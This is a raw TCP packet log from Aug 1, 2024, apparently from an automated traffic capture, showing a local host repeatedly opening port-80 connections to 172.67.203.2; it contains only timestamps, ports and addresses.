                                                  Aug 1, 2024 07:39:19.215409994 CEST8049894172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.215471029 CEST4989480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.219953060 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.336860895 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.341787100 CEST8049896172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.341856956 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.341947079 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.346755981 CEST8049896172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.568437099 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.578025103 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.578062057 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.670613050 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.693381071 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.698347092 CEST8049896172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.786706924 CEST8049896172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:19.818341017 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.865219116 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:19.905854940 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.005858898 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.046780109 CEST8049896172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.128428936 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.175951004 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.175998926 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.176902056 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.181346893 CEST8049895172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.181401968 CEST4989580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.181781054 CEST8049897172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.181860924 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.181945086 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.181962013 CEST8049896172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.182013988 CEST4989680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.186808109 CEST8049897172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.539064884 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.544065952 CEST8049897172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.628077030 CEST8049897172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:20.818332911 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:20.876641035 CEST8049897172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.002108097 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.003055096 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.007548094 CEST8049897172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.007632971 CEST4989780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.007947922 CEST8049898172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.011126041 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.011250019 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.016043901 CEST8049898172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.365437984 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.371403933 CEST8049898172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.483262062 CEST8049898172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.615226030 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.740058899 CEST8049898172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.818353891 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.861481905 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.866866112 CEST8049898172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.866990089 CEST4989880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.896867037 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.901784897 CEST8049899172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:21.901879072 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.902009964 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:21.906810999 CEST8049899172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.257803917 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.262794971 CEST8049899172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.354625940 CEST8049899172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.477592945 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.508009911 CEST8049899172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.627757072 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.627768993 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.633021116 CEST8049900172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.633204937 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.633318901 CEST8049899172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.633371115 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.633405924 CEST4989980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.638199091 CEST8049900172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:22.990283966 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:22.995296001 CEST8049900172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.096977949 CEST8049900172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.255744934 CEST8049900172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.255815029 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.386559963 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.387480021 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.391968966 CEST8049900172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.392039061 CEST4990080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.392347097 CEST8049901172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.392415047 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.392523050 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.397291899 CEST8049901172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.740263939 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:23.745198011 CEST8049901172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.868268013 CEST8049901172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:23.974595070 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.091939926 CEST8049901172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.132755995 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.207181931 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.207873106 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.212476015 CEST8049901172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.212547064 CEST4990180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.212718010 CEST8049902172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.212790966 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.212902069 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.218270063 CEST8049902172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.571068048 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.576098919 CEST8049902172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.676640987 CEST8049902172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.771462917 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.839481115 CEST8049902172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.913031101 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.913039923 CEST4990380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.918035030 CEST8049903172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.918694973 CEST8049902172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.918788910 CEST4990280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.918792963 CEST4990380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.918932915 CEST4990380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.923736095 CEST8049903172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.967084885 CEST4990380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.973862886 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.978729010 CEST8049904172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:24.983139992 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.983192921 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:24.987997055 CEST8049904172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.013973951 CEST8049903172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.290951967 CEST8049903172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.291016102 CEST4990380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.334075928 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.339090109 CEST8049904172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.437602997 CEST8049904172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.505831957 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.690869093 CEST8049904172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.813604116 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.814165115 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.819089890 CEST8049905172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.819179058 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.819251060 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.819322109 CEST8049904172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:25.819376945 CEST4990480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:25.824820995 CEST8049905172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.177743912 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.182813883 CEST8049905172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.284194946 CEST8049905172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.437799931 CEST8049905172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.439415932 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.564126015 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.567065954 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.569397926 CEST8049905172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.569731951 CEST4990580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.571928024 CEST8049906172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.575110912 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.575212002 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.579972982 CEST8049906172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:26.927774906 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:26.933860064 CEST8049906172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.029480934 CEST8049906172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.163069963 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.259318113 CEST8049906172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.382946968 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.383692026 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.388648033 CEST8049907172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.388706923 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.388885975 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.389110088 CEST8049906172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.389173031 CEST4990680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.393799067 CEST8049907172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.740669012 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:27.745754004 CEST8049907172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.836981058 CEST8049907172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.991482019 CEST8049907172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:27.991534948 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.185689926 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.185755968 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.191440105 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:28.191629887 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.191724062 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.192254066 CEST8049907172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:28.192367077 CEST4990780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.197570086 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:28.539078951 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:28.544301987 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:28.665026903 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:28.771519899 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.082392931 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.083779097 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.087146997 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.204267025 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.207062006 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.210233927 CEST8049908172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.211146116 CEST4990880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.212544918 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.215152979 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.215267897 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.220205069 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.568588972 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.573591948 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.689172029 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.818361044 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.945676088 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.976150990 CEST4991080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.981107950 CEST8049910172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:29.981256008 CEST4991080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.981326103 CEST4991080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:29.986279964 CEST8049910172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.005853891 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.036449909 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.036669970 CEST4991080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.090024948 CEST8049910172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.115314007 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.157840967 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.158543110 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.163501978 CEST8049909172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.163515091 CEST8049911172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.163640022 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.163690090 CEST4990980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.164000988 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.169362068 CEST8049911172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.338000059 CEST8049910172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.343163967 CEST4991080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.523165941 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.528286934 CEST8049911172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.632961988 CEST8049911172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.771845102 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.786803007 CEST8049911172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.907438040 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.908010006 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.916548014 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.916634083 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.916755915 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.917927980 CEST8049911172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:30.918169022 CEST4991180192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:30.921587944 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.271718025 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.276834011 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.370440960 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.505880117 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.618459940 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.734741926 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.735219955 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.740170956 CEST8049912172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.740207911 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:31.740245104 CEST4991280192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.740278959 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.740443945 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:31.745331049 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.099679947 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.104769945 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.185749054 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.271465063 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.432764053 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.554054976 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.555099010 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.559573889 CEST8049913172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.559998989 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.560102940 CEST4991380192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.560102940 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.560199976 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.564963102 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:32.914846897 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:32.920175076 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.005156994 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.163058996 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.167409897 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.271466970 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.286066055 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.286803007 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.291347027 CEST8049914172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.291404963 CEST4991480192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.292236090 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.292305946 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.292407990 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.300323963 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.646517992 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.651554108 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.740765095 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:33.818356991 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:33.992466927 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.115334034 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.117953062 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.118583918 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.123502016 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.123529911 CEST8049915172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.123563051 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.123590946 CEST4991580192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.123684883 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.128544092 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.474651098 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.479988098 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.589169979 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.663100004 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:34.855568886 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.946393967 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:34.947129965 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.054083109 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.055082083 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.060317993 CEST8049916172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.060475111 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.060585022 CEST4991680192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.060592890 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.060709953 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.064608097 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.066030025 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.070204973 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.071166992 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.071234941 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.076674938 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.412215948 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.417515039 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.417557001 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.427829981 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.432779074 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.525702953 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.526138067 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.615228891 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.615282059 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.678776979 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.694612026 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.700221062 CEST8049917172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.700279951 CEST4991780192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.799017906 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.799830914 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.804466009 CEST8049918172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.804537058 CEST4991880192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.804842949 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:35.804905891 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.804980040 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:35.809798002 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.162147045 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.168570995 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.247128963 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.461949110 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.462023973 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.498814106 CEST8049919172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.611114025 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.616096973 CEST8049920172.67.203.2192.168.2.4
                                                  Aug 1, 2024 07:39:36.616182089 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.616265059 CEST4991980192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.616283894 CEST4992080192.168.2.4172.67.203.2
                                                  Aug 1, 2024 07:39:36.621855021 CEST8049920172.67.203.2192.168.2.4
